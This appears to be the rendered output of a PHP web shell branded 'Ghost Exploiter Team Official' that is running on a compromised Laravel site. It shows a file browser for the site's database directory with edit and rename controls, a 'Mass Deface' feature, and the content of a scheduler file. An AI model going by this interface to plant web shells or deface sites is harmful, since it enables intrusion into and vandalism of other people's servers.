Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
database
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
factories
--
ren
migrations
--
ren
seeders
--
ren
.gitignore
0.01KB
edt
ren
01KFX1CYAABDKCK27C2KDZB
...
18.24KB
edt
ren
RoleTableSeeder.php
1.04KB
edt
ren
api.php
0KB
edt
ren
auth.php
3.935KB
edt
ren
console.php
0.36KB
edt
ren
debugbar.php
0KB
edt
ren
phpunit.xml
0KB
edt
ren
samurai_activity.log
0.208KB
edt
ren
services.php
1.011KB
edt
ren
<?php declare(strict_types=1); use Illuminate\Foundation\Inspiring; use Illuminate\Support\Facades\Artisan; use Illuminate\Support\Facades\Schedule; //Artisan::command('inspire', function (): void { // $this->comment(Inspiring::quote()); //})->purpose('Display an inspiring quote')->hourly(); Schedule::everyMinute()->command('app:change-payment-status-by1-c');